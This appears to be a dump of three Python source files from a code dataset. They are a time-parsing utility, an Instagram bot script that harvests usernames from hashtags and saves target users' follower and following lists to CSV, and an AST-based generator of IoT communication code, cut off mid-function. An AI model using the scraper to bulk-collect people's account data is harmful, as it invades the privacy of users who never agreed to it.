get_number(self, expression, group_name):\n \"\"\"\n gets the number from self.source that matches the expression\n\n :return: string with number or '0' if not found\n :raise: ApeError if self._source has not been set or group is missing\n :raise: IndexError if the group_name is not found (this is likely an implementation error, we want to crash)\n \"\"\"\n match = expression.search(self.source)\n if match is None:\n return '0'\n return match.group(group_name)\n \n def populate_fields(self):\n \"\"\"\n populates the time fields with values (e.g. self.minutes)\n\n \"\"\"\n years = self.get_number(self.time_map.year_expression, RelativeTimeMapGroups.years)\n months = self.get_number(self.time_map.month_expression, RelativeTimeMapGroups.months)\n weeks = self.get_number(self.time_map.week_expression, RelativeTimeMapGroups.weeks)\n days = self.get_number(self.time_map.day_expression, RelativeTimeMapGroups.days)\n hours = self.get_number(self.time_map.hour_expression, RelativeTimeMapGroups.hours)\n minutes = self.get_number(self.time_map.minute_expression, RelativeTimeMapGroups.minutes)\n seconds = self.get_number(self.time_map.second_expression, RelativeTimeMapGroups.seconds)\n\n now = datetime.now()\n\n # HACK\n # timedelta doesn't handle varying-units (e.g. 28 vs 30 vs 31 day in a month)\n # relativedelta does -- but it returns a datetime object, not a timedelta\n # so the adding and subtracting is to convert it to a timedelta\n self.timedelta = now + relativedelta(years=int(years),\n months=int(months),\n weeks=float(weeks),\n days=float(days),\n hours=float(hours),\n minutes=float(minutes),\n seconds=float(seconds)) - now\n \n return\n\n @source_required\n def total_seconds(self):\n \"\"\"\n gets the timedelta total_seconds\n\n :return: all the times summed to seconds (as a float)\n :raise: ApeError if the source has not been set\n \"\"\"\n return self.timedelta.total_seconds()\n\n def reset(self):\n \"\"\"\n Resets the attributes (undoes populate_fields)\n \"\"\"\n self.timedelta = None\n return\n\n # the operator overloading\n def __eq__(self, other):\n \"\"\"\n Checks if the timedelta is the same as the other.\n\n :param:\n\n - `other`: timedelta\n\n :return: True if self.timedelta is equal to other\n \"\"\"\n return self.timedelta == other\n\n def __lt__(self, other):\n \"\"\"\n Checks if the timedelta is less than the other\n \"\"\"\n return self.timedelta < other\n\n def __gt__(self, other):\n \"\"\"\n Checks if the timedelta is > other \n \"\"\"\n return self.timedelta > other\n \n def __le__(self, other):\n \"\"\"\n Checks if the timedelta is <= other\n \"\"\"\n return self.timedelta <= other\n\n def __ge__(self, other):\n \"\"\"\n Checks if the timedelta is >= other\n \"\"\"\n return self.timedelta >= other\n\n def __ne__(self, other):\n \"\"\"\n Checks to see if the timedelta isn't equal to the other\n\n :return: True if they aren't equal\n \"\"\"\n return self.timedelta != other\n \n def __cmp__(self, other):\n \"\"\"\n Compares timestamp with other timestamp\n\n :param:\n\n - `other`: a timedelta\n\n :return: -1 if less, 0 if equal, 1 if greater\n \"\"\"\n if self.timedelta == other:\n return 0\n if self.timedelta < other:\n return -1\n if self.timedelta > other:\n return 1\n return\n \n @operation_error\n def __add__(self, other):\n \"\"\"\n adds the timedelta to other\n\n :param:\n\n - `other`: a timedelta object\n\n :return: self.timedelta + other\n \"\"\"\n return self.timedelta + other\n\n @operation_error\n def __radd__(self, other):\n \"\"\"\n adds the timedelta to other\n\n :param:\n\n - `other`: a timedelta object\n\n :return: self.timedelta + other\n \"\"\"\n return self.timedelta + other\n\n @operation_error\n def __sub__(self, other):\n \"\"\"\n subtracts the other from the timedelta\n\n :param:\n\n - `other`: a timedelta object\n\n :return: self.timedelta - other\n \"\"\"\n return self.timedelta - other\n\n @operation_error\n def __rsub__(self, other):\n \"\"\"\n subtracts the timedelta from the other\n\n :param:\n\n - `other`: a timedelta object\n\n :return: other - self.timedelta\n \"\"\"\n return other - self.timedelta\n\n @number_error\n def __mul__(self, multiplier):\n \"\"\"\n mulitplies the timedelta\n\n :return: timedelta * multiplier \n \"\"\"\n return self.timedelta * multiplier\n\n @number_error\n def __rmul__(self, multiplier):\n \"\"\"\n mulitplies the timedelta\n\n :return: multiplier * timedelta \n \"\"\"\n return multiplier * self.timedelta\n\n def __str__(self):\n \"\"\"\n Pass-through to the time-delta\n \"\"\"\n return str(self.timedelta)\n\n def __repr__(self):\n \"\"\"\n Pass-through to the timedelta\n \"\"\"\n return self.timedelta.__repr__()\n\n @unary_error\n def __neg__(self):\n \"\"\"\n Negates the timedelta\n\n :return: -self.timedelta\n \"\"\"\n return -self.timedelta\n\n @unary_error\n def __pos__(self):\n \"\"\"\n Makes the timedelta positive\n\n :return: +self.timedelta\n \"\"\"\n return +self.timedelta\n\n @unary_error\n def __abs__(self):\n \"\"\"\n Calls the absolute function on the timedelta\n\n :return: abs(self.timedelta)\n \"\"\"\n return abs(self.timedelta)\n\n @number_error\n def __floordiv__(self, integer):\n \"\"\"\n Computes the floor and throws away the remainder\n\n :return: self.timedelta // integer \n \"\"\"\n return self.timedelta // integer\n\n def __str__(self):\n return self.source\n# end class RelativeTime\n\nclass AbsoluteTime(BaseClass):\n \"\"\"\n A container for the dateutil.parser.parse\n \"\"\"\n def __init__(self, default=None, ignoretz=False, tzinfos=None, dayfirst=False,\n yearfirst=False, fuzzy=True, parserinfo=None):\n \"\"\"\n AbsoluteTime constructor\n\n :param:\n\n - `default`: datetime object to use to supply missing fields\n - `ignoretz`: if true, ignore timezone information in string\n - `tzinfos`: dict or function that provides custom timezone information\n - `dayfirst`: if true, ambiguous dates assume DD-MM-YY first\n - `yearfirst`: if true, ambiguous dates assume YY-MM-DD\n - `fuzzy`: if true, ignore unrecognizable tokens\n - `parserinfo`: parserinfo class that changes the behavior of the parser\n \"\"\"\n super(AbsoluteTime, self).__init__()\n self.default = default\n self.ignoretz = ignoretz\n self.tzinfos = tzinfos \n self.dayfirst = dayfirst\n self.yearfirst = yearfirst\n self.fuzzy = fuzzy\n self.parserinfo = parserinfo\n return\n\n def __call__(self, source):\n \"\"\"\n The main interface -- calls dateutil.parser.parse(source)\n\n :param:\n\n - `source`: string with time and date information to create datetime\n\n :return: datetime object created from `source`\n :raise: ApeError if the string is unrecognizable\n \"\"\"\n try:\n return dateutil.parser.parse(source,\n default=self.default,\n ignoretz=self.ignoretz,\n tzinfos=self.tzinfos,\n dayfirst=self.dayfirst,\n yearfirst=self.yearfirst,\n fuzzy=self.fuzzy,\n parserinfo=self.parserinfo)\n except ValueError as error:\n self.log_error(error)\n raise ApeError(\"dateutil.parser.parse unable to parse '{0}'\".format(source))\n return\n# end class AbsoluteTime\n\ntime_validator = Validator({'relative_time':RelativeTime,\n 'absolute_time':AbsoluteTime()})\n\nif __name__ == '__main__':\n import pudb; pudb.set_trace()\n r = RelativeTime('3 seconds')\n t = timedelta(seconds=3)\n r.seconds\n check = r != t","sub_path":"theape/infrastructure/timemap.py","file_name":"timemap.py","file_ext":"py","file_size_in_byte":18311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"161415846","text":"from instabot import *\nimport os\nimport shutil\nimport time\nimport random\nfrom important import config\n\n\ndef delay(num):\n time.sleep(random.randint(5 * num, 10 * num))\n\n\ndef hashtag_username():\n hash = input(\"Enter hashtag = \")\n prev = []\n\n if not os.path.isdir(f'output/{hash}'):\n os.mkdir(f'output/{hash}')\n if not os.path.isfile(f'output/{hash}/username.csv'):\n prev = []\n with open(f'output/{hash}/username.csv', 'a') as file:\n file.write('')\n file.close()\n\n else:\n with open(f'output/{hash}/username.csv', 'r') as file:\n f = file.read()\n prev = f.split('\\n')\n file.close()\n for i in range(1000):\n start = time.time()\n users = insta.get_hashtag_users(str(hash))\n print(users)\n print(len(users))\n delay(2)\n new = list(set(users) - set(prev))\n print(new)\n print(len(new))\n prev = prev + list(new)\n with open(f'output/{hash}/username.csv', 'a') as outfile:\n outfile.write(\"\\n\".join(str(item) for item in new))\n end = time.time()\n print(\"total time taken : \", end - start)\n\n\ndef userfollowerfollowing():\n username = str(input(\"Enter target Username = \"))\n\n if not os.path.isdir(f'output/{username}'):\n os.mkdir(f'output/{username}')\n\n followings = insta.get_user_following(username)\n with open(f'output/{username}/following.csv', 'a') as file:\n for following in followings:\n print(following)\n file.write(str(following) + '\\n')\n file.close()\n\n delay(5)\n\n followers = insta.get_user_followers(username)\n with open(f'output/{username}/followers.csv', 'a') as file:\n for follower in followers:\n print(follower)\n file.write(str(follower) + '\\n')\n file.close()\n delay(4)\n\n\nif os.path.isdir('config'):\n shutil.rmtree('config')\n\ninsta = Bot()\n\ninsta.login(username=config.getUsername(), password=config.getPassword())\n\nwhile True:\n\n delay(3)\n print(\"___________MENU__________\\n \\n\"\n \" 1) Get Usernames From HashTag \\n\"\n \" 2) Get Followers and Following From Username\\n\")\n choose = int(input(\"Choose (1-2) = \"))\n start = time.time()\n\n if choose == 1:\n hashtag_username()\n elif choose == 2:\n userfollowerfollowing()\n else:\n print(\"Incorrect Selection\")\n break\n\n end = time.time()\n print(\"total time taken : \", end - start)\n\n\n\n\n\n\n\n\n","sub_path":"hashtag.py","file_name":"hashtag.py","file_ext":"py","file_size_in_byte":2500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"327874240","text":"import ast\nimport astunparse\nimport io\nimport sys\nimport os\n\ncommuTable = {\n 'Arduino' : {'Arduino':None, 'Raspberry':'Serial', 'Cloud':'http', 'Mobile':'Bluetooth'},\n 'Raspberry' : {'Arduino':'Serial', 'Raspberry':None, 'Cloud':'http', 'Mobile':'Socket'},\n 'Cloud' : {'Arduino':'http', 'Raspberry':'http', 'Cloud':None, 'Mobile':'http'},\n 'Mobile' : {'Arduino':'Bluetooth', 'Raspberry':'Socket', 'Cloud':'http', 'Mobile':None}\n }\n\ndebug = False\n\ndef codegen(node):\n astunparse.Unparser(node, sys.stdout)\n \nclass distFile(ast.NodeVisitor):\n def __init__(self, filePath):\n self.className = \"\"\n self.isDef = False\n self.filePath = filePath\n \n def generic_visit(self, node):\n if type(node).__name__ == 'ClassDef':\n self.isDef = True\n self.className = node.name\n else:\n self.isDef = False\n \n # 클래스 선언이 시작되면 클래스 별 저장\n if self.isDef == True:\n fileName = self.filePath\n if not os.path.exists(self.filePath):\n os.mkdir(self.filePath)\n fileName += \"/\" + self.className\n fileName += \".py\"\n f = open(fileName, 'w+t') \n sio = io.StringIO()\n astunparse.Unparser(node.body, sio)\n f.write(sio.getvalue())\n f.close()\n \n ast.NodeVisitor.generic_visit(self, node)\n\nclass replaceAST(ast.NodeTransformer):\n importList = []\n \n def __init__(self):\n self.className = \"\"\n self.dispatchName = []\n\n def visit_FunctionDef(self, node):\n for callee in calleeArr:\n n = node.name\n \n if callee[0] == n and callee[1] == self.className:\n insertBody = CommLib.commRecvLib(self.className, callee[2], node)\n node.args.args.clear()\n break \n else:\n insertBody = []\n \n newNode = self.generic_visit(node)\n \n num = 0\n \n newBody = self.visit_body(newNode.body)\n \n for body in insertBody:\n newBody.insert(num, body)\n num = num + 1\n \n newNode.body = newBody\n \n return newNode\n \n def visit_ClassDef(self, node):\n self.className = node.name\n self.dispatch_flag = False\n newFunctionList = self.getDispatch()\n newNode = self.generic_visit(node)\n \n newBody = self.visit_body(node.body)\n needCommu = False\n \n for callee in calleeArr:\n if classArr.get(self.className) == 'Arduino' and (callee[1] == self.className or callee[2] == self.className):\n newBody.insert(0, ast.parse(\"_include = 'ArduinoJson.h'\"))\n needCommu = True\n break\n \n newNode.body = newBody\n num = 0\n \n for stmt in newNode.body:\n if type(stmt).__name__ == 'FunctionDef' and classArr.get(self.className) == 'Arduino' and needCommu:\n annAst = ast.AnnAssign(target = ast.Name(id = 'jsonBuffer', ctx = ast.Load()), annotation = ast.Name(id = 'DynamicJsonBuffer', ctx = ast.Load()), value = None, simple = 1)\n newNode.body.insert(num, annAst)\n# newNode.body.insert(num, ast.parse('_DynamicJsonBuffer_jsonBuffer'))\n# newNode.body.insert(num + 1, ast.Expr(value = ast.Name(id = '_JsonObject&_jsonObject', ctx = ast.Load())))\n needCommu = False\n break\n else:\n num = num + 1\n \n num = 0\n \n if classArr.get(self.className) == 'Arduino':\n loopFunction = self.getLoop()\n \n for stmt in newNode.body:\n if type(stmt).__name__ == 'FunctionDef' and stmt.name == 'setup': \n newNode.body.insert(num + 1, loopFunction)\n break\n else:\n num = num + 1\n \n num = 0\n \n for stmt in newNode.body:\n if type(stmt).__name__ == 'FunctionDef':\n if classArr.get(self.className) == 'Arduino':\n num = num + 1\n if stmt.name == 'loop':\n for newFunction in newFunctionList:\n newNode.body.insert(num, newFunction)\n num = num + 1\n break\n \n else:\n for newFunction in newFunctionList:\n newNode.body.insert(num, newFunction)\n num = num + 1\n break\n else:\n num = num + 1\n \n for impStmt in replaceAST.importList:\n newNode.body.insert(0, ast.Import(names = [ast.alias(name = impStmt, asname = None)]))\n\n replaceAST.importList = []\n newNode = ast.ClassDef(bases = node.bases, body = newNode, decorator_list = node.decorator_list, name = node.name)\n \n \n if self.dispatch_flag == True and classArr.get(self.className) != 'Arduino':\n if len(newFunctionList) > 1:\n num = 0\n for newFunction in newFunctionList:\n newNode.body.body.append(ast.parse(\"thread\"+ str(num) + \" = threading.Thread(target = \" + newFunction.name + \", args = ())\"))\n num = num + 1\n \n for n in range(0, num):\n newNode.body.body.append(ast.parse(\"thread\" + str(n) + \".start()\"))\n \n for n in range(0, num):\n newNode.body.body.append(ast.parse(\"thread\" + str(n) + \".join()\"))\n else:\n for newFunction in newFunctionList:\n newNode.body.body.append(ast.parse(newFunction.name + \"()\"))\n# dispatchValue = ast.Call(args = [], func = ast.Name(id='dispatch', ctx=ast.Load()), keywords = [])\n# dispatchCall = ast.Assign(targets = [ast.Name(id='_firstCall', ctx = ast.Store())], value = dispatchValue)\n# newNode.body.body.append(dispatchCall)\n \n return newNode\n \n def visit_While(self, node):\n newNode = self.generic_visit(node)\n newBody = self.visit_body(newNode.body)\n newNode.body = newBody\n \n return newNode\n \n def visit_If(self, node):\n newNode = self.generic_visit(node)\n \n newBody = self.visit_body(newNode.body)\n newNode.body.clear()\n\n for stmt in newBody:\n newNode.body.append(stmt)\n \n return newNode\n\n def visit_For(self, node):\n newNode = self.generic_visit(node)\n \n newBody = self.visit_body(newNode.body)\n newNode.body = newBody\n \n return newNode\n\n def visit_body(self, body):\n newBody = []\n for stmt in body:\n if debug:\n print (type(stmt))\n\n if type(stmt).__name__ == 'Assign' or type(stmt).__name__ == 'Expr':\n\n if type(stmt).__name__ == 'Assign':\n targets = stmt.targets\n \n if type(targets[0]).__name__ == 'Name' and targets[0].id == '_import_list':\n if type(stmt.value).__name__ == 'List' or type(stmt.value).__name__ == 'Tuple':\n for elem in stmt.value.elts:\n if type(elem).__name__ == 'Str' and elem.s not in replaceAST.importList:\n replaceAST.importList.append(elem.s)\n elif type(stmt.value).__name__ == 'Str':\n if stmt.value.s not in replaceAST.importList:\n replaceAST.importList.append(stmt.value.s)\n continue\n else:\n targets = []\n \n if type(stmt.value).__name__ == 'Call' and type(stmt.value.func).__name__ == 'Attribute' and type(stmt.value.func.value).__name__ == 'Name':\n clz = stmt.value.func.value.id\n meth = stmt.value.func.attr\n\n newStmts = CommLib.commSendLib(self.className, clz, targets, meth, stmt)\n \n for newStmt in newStmts:\n newBody.append(newStmt)\n \n else:\n newBody.append(stmt)\n\n else:\n newBody.append(stmt)\n\n return newBody\n \n def getLoop(self):\n loopFunction = ast.FunctionDef()\n loopFunction.body = []\n isExist = False\n callFunction = [] # 루프 내에서 호출되어야 하는 함수 목록\n \n if classArr.get(self.className) == 'Arduino':\n for locProc in allLocProcList: # 모든 위치에 있는 함수들 목록\n if classArr.get(locProc[0]) == 'Arduino': \n if locProc[1] == 'setup':\n pass\n else:\n for callTup in calleeArr: # 어디서 어디에 있는 함수를 호출하는지\n if callTup[1] == self.className and callTup[0] == locProc[1]:\n # dispatch에 들어가는 함수이기 때문에 loop에 선언될 필요가 없음\n isExist = True\n break\n elif callTup[1] == self.className:\n pass\n elif callTup[0] == locProc[1]:\n pass \n else:\n if locProc[1] in localFunc:\n pass\n elif locProc[1] not in callFunction:\n callFunction.append(locProc[1])\n \n if isExist == True:\n for name in self.dispatchName:\n loopFunction.body.append(ast.parse(name + \"()\"))\n \n if callFunction != []:\n for expr in callFunction:\n loopFunction.body.append(ast.parse(expr + '()'))\n \n if loopFunction.body == []:\n return []\n \n loopFunction.args = []\n loopFunction.decorator_list = []\n loopFunction.name = 'loop'\n loopFunction.returns = ast.NameConstant(value = None)\n \n return loopFunction\n \n \n def getDispatch(self):\n caller = \"\"\n callee = \"\"\n \n commNodeList = []\n commProtocolList = []\n \n currentCommFuncDict = {}\n \n newIfList = []\n hasIfStmt = False\n \n for elem in calleeArr:\n if elem[1] == self.className:\n if currentCommFuncDict == {}:\n callee = elem[1]\n caller = elem[2]\n currentCommFuncDict[caller] = [elem[0]]\n else:\n if elem[1] == callee and elem[2] == caller:\n currentCommFuncDict.get(caller).append(elem[0])\n else:\n caller = elem[2]\n if caller in currentCommFuncDict.keys():\n currentCommFuncDict.get(caller).append(elem[0])\n else:\n currentCommFuncDict[caller] = [elem[0]]\n \n currentCommFuncKeys = list(currentCommFuncDict.keys())\n \n # 같은 통신 방법을 사용하는 클래스를 묶기 위한 과정\n for f_index in range(0, len(currentCommFuncDict.keys()) - 1):\n f_commu = commuTable.get(classArr.get(currentCommFuncKeys[f_index])).get(classArr.get(self.className))\n for s_index in range(f_index + 1, len(currentCommFuncDict.keys())):\n s_commu = commuTable.get(classArr.get(currentCommFuncKeys[s_index])).get(classArr.get(self.className))\n # 현재 클래스와 첫번째 클래스, 두번째 클래스가 사용하는 통신 방법이 같은 경우\n if f_commu == s_commu:\n if currentCommFuncKeys[s_index] not in currentCommFuncDict.get(currentCommFuncKeys[f_index]):\n sFuncList = currentCommFuncDict.get(currentCommFuncKeys[s_index])\n for func in sFuncList:\n currentCommFuncDict.get(currentCommFuncKeys[f_index]).append(func)\n del currentCommFuncDict[currentCommFuncKeys[s_index]]\n \n for currentCaller in currentCommFuncDict.keys():\n funNum = -1\n for locProcTup in allLocProcList:\n if locProcTup[0] == self.className and locProcTup[1] in currentCommFuncDict.get(currentCaller):\n hasIfStmt = True\n funNum = locProcTup[2]\n ifSource = \"if funid == \" + str(funNum) + \":\\n\"\n ifSource += \"\\t\" + locProcTup[1] + \"()\\n\"\n newIfList.append(ast.parse(ifSource))\n \n commProtocol = commuTable.get(classArr.get(currentCaller)).get(classArr.get(self.className))\n if commProtocol not in commProtocolList:\n commNodeList.append(self.getCommuNode(self.className, currentCaller, newIfList))\n commProtocolList.append(commProtocol)\n \n newIfList = []\n \n \n if hasIfStmt == False:\n return []\n \n n = 0\n \n newFunctionList = []\n \n for commNode in commNodeList:\n newFunction = ast.FunctionDef()\n newFunction.body = []\n commProtocolIndex = commNodeList.index(commNode)\n \n for comm in commNode:\n newFunction.body.insert(n, comm)\n n = n + 1\n \n if classArr.get(self.className) == 'Arduino':\n newFunction.name = 'dispatch_' + commProtocolList[commProtocolIndex]\n newFunction.returns = ast.NameConstant(value = None)\n self.dispatchName.append('dispatch_' + commProtocolList[commProtocolIndex])\n else:\n newFunction.name = 'dispatch_' + commProtocolList[commProtocolIndex]\n \n newFunction.args =[]\n newFunction.decorator_list = []\n self.dispatch_flag = True\n \n newFunctionList.append(newFunction)\n \n if len(newFunctionList) > 1:\n if \"threading\" not in replaceAST.importList:\n replaceAST.importList.append(\"threading\")\n \n return newFunctionList\n \n def getCommuNode(self, callee, caller, ifNode):\n calleeClass = classArr.get(callee)\n callerClass = classArr.get(caller)\n comm = commuTable.get(callerClass).get(calleeClass)\n \n newCommu = []\n\n if comm == 'Serial':\n if calleeClass == 'Arduino':\n newCommu.append(ast.parse('str: String = \"\"'))\n bodySource = \"if Serial.available() > 0:\\n\" + \"\\tstr = Serial.readStringUntil(char('\\\\n'))\\n\"\n newCommu.append(ast.parse(\"funid: int = 0\"))\n newCommu.append(ast.parse(bodySource))\n ifBodyAst = []\n valueAst = ast.Call(args = [ast.Name(id = \"str\", ctx = ast.Load())], func = ast.Attribute(attr = \"parseObject\", ctx = ast.Load(), value = ast.Name(id = \"jsonBuffer\", ctx = ast.Load())), keywords = [], kwargs = None, starargs = None)\n ifBodyAst.append(ast.AnnAssign(target = [ast.Name(id=\"jsonObject\", ctx = ast.Load())], annotation = ast.Name(id = \"JsonObject\", ctx = ast.Load()), value = valueAst, simple = 1))\n ifBodyAst.append(ast.parse(\"funid = jsonObject['_funid']\"))\n newCommu.append(ast.If(test = ast.Compare(comparators = [ast.Str(s = \"\")], left = ast.Name(id = \"str\", ctx = ast.Load()), ops = [ast.NotEq()]), body = ifBodyAst, orelse = []))\n newCommu.append(ifNode)\n newCommu.append(ast.parse('funid = -1'))\n \n return newCommu\n \n elif calleeClass == 'Raspberry':\n newCommu.append(ast.parse('global _ser, _jsonData'))\n newCommu.append(ast.parse('_ser = serial.Serial(\"/dev/ttyACM0\", 9600)'))\n whileBody = []\n whileBody.append(ast.parse('jsonStr = _ser.readline().strip().decode(\"utf-8\")'))\n whileBody.append(ast.parse('if jsonStr == \"\":\\n\\tcontinue'))\n whileBody.append(ast.parse('_jsonData = json.loads(jsonStr)'))\n whileBody.append(ast.parse('funid = _jsonData[\"_funid\"]'))\n whileBody.append(ifNode)\n whileBody.append(ast.parse('funid = -1'))\n whileNode = ast.While(test = ast.Name(id = 'True', ctx = ast.Load()), body = whileBody, orelse = [])\n newCommu.append(whileNode)\n \n return newCommu\n \n elif comm == 'Socket':\n if calleeClass == 'Raspberry':\n newCommu.append(ast.parse('global _conn'))\n newCommu.append(ast.parse('s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)'))\n newCommu.append(ast.parse('s.bind((HOST, PORT))'))\n newCommu.append(ast.parse('s.listen(1)'))\n whileBody = []\n whileBody.append(ast.parse('_conn, addr = s.accept()'))\n whileBody.append(ast.parse('global _recieveJsonData'))\n whileBody.append(ast.parse('_recieveData = \"\"'))\n whileBody.append(ast.parse('_cnt = 0'))\n \n source = \"while True:\\n\"\n source += \"\\ttmp = _conn.recv(1).decode('utf-8')\\n\" + \"\\t_recieveData += tmp\\n\"\n source += \"\\tif tmp == '{':\\n\" + \"\\t\\t_cnt = _cnt + 1\\n\" + \"\\telif tmp == '}':\\n\" + \"\\t\\t_cnt = _cnt - 1\\n\"\n source += \"\\tif _cnt == 0:\\n\" + \"\\t\\tbreak\\n\"\n whileBody.append(ast.parse(source))\n \n whileBody.append(ast.parse('if _recieveData == \"\":\\n\\tcontinue\\n'))\n whileBody.append(ast.parse('_recieveJsonData = json.loads(_recieveData)'))\n whileBody.append(ast.parse('funid = _recieveJsonData[\"_funid\"]'))\n whileBody.append(ifNode)\n whileBody.append(ast.parse('funid = -1'))\n whileNode = ast.While(test = ast.Name(id='True', ctx = ast.Load()), body = whileBody, orelse = [])\n newCommu.append(whileNode)\n \n return newCommu\n \n elif calleeClass == 'Mobile':\n newCommu.append(ast.parse('global _conn'))\n newCommu.append(ast.parse('s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)'))\n newCommu.append(ast.parse('s.bind((HOST, PORT))'))\n newCommu.append(ast.parse('s.listen(1)'))\n \n whileBody = []\n whileBody.append(ast.parse('_conn, addr = s.accept()'))\n \n source = \"while True:\\n\"\n source += \"\\ttmp = _conn.recv(1).decode('utf-8')\\n\" + \"\\t_recieveData += tmp\\n\"\n source += \"\\tif tmp == '{':\\n\" + \"\\t\\t_cnt = _cnt + 1\\n\" + \"\\telif tmp == '}':\\n\" + \"\\t\\t_cnt = _cnt - 1\\n\"\n source += \"\\tif _cnt == 0:\\n\" + \"\\t\\tbreak\\n\"\n whileBody.append(ast.parse(source))\n whileBody.append(ifNode)\n whileBody.append(ast.parse('funid = -1'))\n \n whileNode = ast.While(test = ast.Name(id = 'True', ctx = ast.Load()), body = whileBody, orelse = [])\n newCommu.append(whileNode)\n \n return newCommu\n \n elif comm == 'http': \n if calleeClass == 'Cloud':\n newCommu.append(ast.parse('funid = int(sys.argv[1])'))\n newCommu.append(ifNode)\n \n return newCommu\n \n elif calleeClass == 'Mobile':\n newCommu.append(ifNode)\n return newCommu\n \n elif comm == 'Bluetooth':\n newCommu.append(ifNode)\n return newCommu\n else:\n print (\"Not Supported Communication way\")\n \n return newCommu\n \nclass CommLib(): \n def commSendLib(fromClz, toClz, targets, meth, node):\n try:\n locToClz = classArr[toClz]\n locFromClz = classArr[fromClz]\n except:\n return [node]\n \n methval = ast.Num(n = -1)\n \n for remoteTup in allLocProcList:\n if remoteTup[0] == toClz and remoteTup[1] == meth:\n methval = ast.Num(n = remoteTup[2])\n break\n\n if locFromClz == 'Arduino' and locToClz == 'Raspberry':\n newNodes = CommLib.sendBySerialAtArduino(node, methval)\n \n if locFromClz == 'Raspberry' and locToClz == 'Arduino':\n newNodes = CommLib.sendBySerialAtRaspberry(node, methval)\n \n if locFromClz == 'Raspberry' and locToClz == 'Cloud':\n newNodes = CommLib.sendByHttpAtRaspberry(node, methval, targets)\n \n if locFromClz == 'Raspberry' and locToClz == 'Mobile':\n newNodes = CommLib.sendBySocketAtRaspberry(node, methval, targets)\n \n if locFromClz == 'Mobile' and locToClz == 'Cloud':\n newNodes = CommLib.sendByHttpAtMobile(node, methval, targets)\n \n if locFromClz == 'Mobile' and locToClz == 'Raspberry':\n newNodes = CommLib.sendBySocketAtMobile(node, methval)\n \n# else:\n# print (\"Invalid location\")\n# return [node]\n \n return newNodes\n \n def commRecvLib(toClz, fromClz, node):\n try:\n locToClz = classArr[toClz]\n locFromClz = classArr[fromClz]\n \n except:\n# print (\"commRecvLib : Exception\")\n return []\n \n returnNewArgs = []\n \n if locFromClz == 'Arduino' and locToClz == 'Raspberry':\n newArgs = CommLib.recieveBySerialAtRaspberry(node)\n \n for stmt in newArgs:\n returnNewArgs.append(stmt)\n \n if locFromClz == 'Raspberry' and locToClz == 'Arduino':\n newArgs = CommLib.recieveBySerialAtArduino(node)\n \n for stmt in newArgs:\n returnNewArgs.append(stmt)\n \n if locFromClz == 'Raspberry' and locToClz == 'Cloud':\n newArgs = CommLib.recieveByHttpAtCloud(node)\n \n for stmt in newArgs:\n returnNewArgs.append(stmt)\n \n if locFromClz == 'Raspberry' and locToClz == 'Mobile':\n newArgs = CommLib.recieveBySocketAtMobile(node)\n \n for stmt in newArgs:\n returnNewArgs.append(stmt)\n \n if locFromClz == 'Mobile' and locToClz == 'Cloud':\n newArgs = CommLib.recieveByHttpAtCloud(node)\n \n for stmt in newArgs:\n returnNewArgs.append(stmt)\n if locFromClz == 'Mobile' and locToClz == 'Raspberry':\n newArgs = CommLib.recieveBySocketAtRaspberry(node)\n \n for stmt in newArgs:\n returnNewArgs.append(stmt)\n# else:\n# print (\"Invalid location\")\n# return [node]\n \n return newArgs\n \n #아두이노에서 라즈베리 파이로 보내는 시리얼 통신\n def sendBySerialAtArduino(node, methval): \n # jsonObject = jsonBuffer.createObject()\n # jsonObject[\"args1\"] = args1\n # jsonObject[\"args2\"] = args2\n # ...\n # jsonObject[\"argsn\"] = argsn\n # jsonObject.printTo(Serial)\n \n smethval = CommLib.unparseExpr(methval)\n newAsts = []\n \n newAsts.append(ast.parse('sendFunid: JsonObject = jsonBuffer.createObject()'))\n newAsts.append(ast.parse('sendFunid[\"_funid\"] = ' + smethval))\n newAsts.append(ast.parse('sendFunid.printTo(Serial)'))\n \n newAsts.append(ast.parse('jsonObject: JsonObject = jsonBuffer.createObject()'))\n num = 0\n \n for arg in node.value.args:\n sarg = CommLib.unparseExpr(arg)\n newAsts.append(ast.parse('jsonObject[\"args' + str(num) + '\"] = ' + sarg))\n num = num + 1\n \n newAsts.append(ast.parse('jsonObject.printTo(Serial)'))\n newAsts.append(ast.parse('jsonBuffer.clear()'))\n\n return newAsts\n\n # 아두이노에서 라즈베리 파이에서 받은 값을 읽는 시리얼 통신\n def recieveBySerialAtArduino(node):\n # servoControl(self, methval, data1, data2, ..., datan)\n \n # String recieveData = \"\"\n # while Serial.available() > 0:\n # recieveData = Serial.readString()\n \n # JsonObject& jsonObject = jsonBuffer.createObject(recieveData)\n \n # data1 = jsonObject[\"args1\"]\n # data2 = jsonObject[\"args2\"]\n # ...\n # datan = jsonObject[\"argsn\"]\n \n newAsts = []\n \n newAsts.append(ast.parse('recieveData: String = Serial.readStringUntil(char(\"\\\\n\"))'))\n \n ifSource = \"if recieveData != '':\\n\" + \"\\trecieveJson: JsonObject = jsonBuffer.parseObject(recieveData)\\n\"\n \n num = 0\n for arg in node.args.args:\n sarg = CommLib.unparseExpr(arg)\n argAst = ast.parse(sarg)\n newAsts.append(ast.parse(sarg))\n ifSource += \"\\ttmp\" + str(num) + \": \" + argAst.body[0].annotation.id + \" = recieveJson['args\" + str(num) + \"']\\n\"\n ifSource += \"\\t\" + argAst.body[0].target.id + \" = tmp\" + str(num) + \"\\n\"\n num = num + 1\n\n newAsts.append(ast.parse(ifSource))\n newAsts.append(ast.parse('jsonBuffer.clear()'))\n\n return newAsts\n \n #라즈베리파이에서 아두이노의 값을 읽어오는 시리얼 통신\n def recieveBySerialAtRaspberry(node): \n # requesttest(self, val1, val2, ..., valn)\n #\n #import serial\n #import requests\n #ser=serial.Serial('/dev/ttyACM0', 9600) -> option으로 device, baud rate\n #{\"Serial\":[dev:'/dev/ttyACM0', baudrate:9600]}\n \n #val1 = ser.read(1)\n #val2 = ser.read(1)\n #...\n #valn = ser.read(1)\n\n newAsts = []\n \n if 'serial' not in replaceAST.importList:\n replaceAST.importList.append('serial')\n \n if 'json' not in replaceAST.importList:\n replaceAST.importList.append('json')\n \n newAsts.append(ast.parse('_recieveData = _ser.readline().strip().decode(\"utf-8\")'))\n newAsts.append(ast.parse('global _recieveJsonData'))\n \n ifSource = 'if _recieveData != \"\":\\n' + '\\t_recieveJsonData = json.loads(_recieveData)\\n'\n ifSource += 'else:\\n' + '\\t_recieveJsonData = \"\"\\n'\n newAsts.append(ast.parse(ifSource))\n 